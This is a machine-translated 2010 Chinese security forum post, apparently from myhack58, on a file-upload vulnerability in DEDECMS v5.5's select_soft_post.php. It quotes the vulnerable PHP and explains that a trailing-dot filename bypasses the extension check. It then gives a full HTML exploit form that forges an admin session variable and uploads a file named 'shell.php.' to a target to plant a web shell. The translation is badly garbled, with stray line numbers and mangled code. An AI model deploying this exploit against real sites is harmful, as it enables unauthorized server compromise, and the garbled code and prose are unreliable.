DEDECMS v5. 5 Final select_soft_post.php vulnerability-vulnerability warning-the black bar safety net

2010-03-14T00:00:00
ID MYHACK58:62201026429
Type myhack58
Reporter 佚名
Modified 2010-03-14T00:00:00

Description

Author:st0p

Today only from Wolves Security Team to see toby57 large cattle released"DEDECMS v5. 5 GBK Final one. vulnerability"this article,the original address:http://bbs.wolvez.org/topic/125/

Your own local testing a bit,covering the SESSION this little chicken threat is true,because the request session. auto_start = 1 case,General session. auto_start this is off,so is the chicken threat. However the back of the holding SHELL when you succeed into the background of the case can be used..

And session. auto_start is generally to and session_start()together with. Checked the information,only in the session. auto_start turned on,the first call to session_start(),and only then it is possible. However, specific hybrid coverage of the SESSION I didn't go to see,alas,to really get down to the head of the non-Halo non - ...air-in look..

I looked at it,in fact, GBK and UTF8 are there to this problem,don't know to find this big cow why just put the title write the GBK...

看 了 一下 /include/dialog/select_soft_post.php

The main problems appear in the manually specify the file name,rename the part. When our name is st0p. php. When,note,php after a point,you can skip the verification,look at the code

|

1 2 3 4 5 6 7 8 9 1 0 1 1 1 2 1 3 1 4 1 5 1 6 1 7 1 8 1 9 2 0 2 1 2 2 2 3 2 4 2 5 2 6 2 7 2 8 2 9 3 0

|

...... //File name for the manual specifies, which is automatic processing if(! empty($newname)) { $filename = $newname; //when we have a new name for st0p. php. When if(! ereg dividing(".", $filename)) $fs = explode('.', $uploadfile_name); //when$filename does not contain. When calling else $fs = explode('.', $filename); //when$filename contains. Call if(eregi($cfg_not_allowall, $fs[count($fs)-1])) //$fs[count($fs)-1]to get the value is null,skip the validation { ShowMsg("you specified a file name is system prohibited!",' javascript:;'); exit(); } if(! ereg dividing(".", $filename)) $filename = $filename.'.'.$ fs[count($fs)-1]; } else { $filename = $cuserLogin->getUserID().'-'. dd2char(MyDate('ymdHis',$nowtme)); $fs = explode('.', $uploadfile_name); if(eregi($cfg_not_allowall, $fs[count($fs)-1])) { ShowMsg("you uploaded some there may be unsafe factors of the file, the system refused to operate!",' javascript:;'); exit(); } $filename = $filename.'.'.$ fs[count($fs)-1]; } $fullfilename = $cfg_basedir.$ activepath.'/'.$ filename; //Hey, Hey,skip verification,$filename 还 为 st0p.php. $fullfileurl = $activepath.'/'.$ filename; move_uploaded_file($uploadfile,$fullfilename) or die("Upload file to $fullfilename failed!"); @unlink($uploadfile); ......

---|---

EXP is as follows

1 2 3 4 5 6 7 8 9 1 0 1 1 1 2 1 3 1 4 1 5 1 6 1 7 1 8 1 9 2 0 2 1 2 2 2 3 2 4 2 5 2 6 2 7 2 8 2 9 3 0 3 1 3 2 3 3 3 4 3 5 3 6 3 7 3 8 3 9 4 0 4 1 4 2 4 3 4 4 4 5 4 6

|

<! DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> the <head> <meta http-equiv="Content-Type" content="text/html; charset=utf-8" /> the <title>DEDECMS v5. 5 Final select_soft_post.php EXP</title> <script type="text/javascript"> function fsubmit(){ var form = document. forms[0]; form. action = form. target. value + form. path. value; tmpstr = form. target. value +'/'+ form. newname. value; form. bkurl. value = tmpstr. substr(0,tmpstr. length-1); form. submit(); } </script> <style type="text/css"> <!-- body { text-align: center; } --> </style> </head>

the <body> the <h3>DEDECMS v5. 5 Final select_soft_post.php EXP</h3> <form action="" method="post" enctype="multipart/form-data"> <p> <input type="hidden" name="_SESSION[dede_admin_id]" value="1" /> <input type="hidden" name="bkurl" value="1" /> <label>Target: <input name="target" type="text" id="target" value="http://target" /> </label> <label>Path: <input name="path" type="text" id="path" value="/include/dialog/select_soft_post.php" /> </label> <label>File: <input type="file" name="uploadfile" id="uploadfile" /> </label> <label>NewName: <input name="newname" type="text" id="newname" value="shell.php." /> </label> <input type="submit" name="button" id="button" value="Fuck" /> </p> </form> </body> </html>

---|---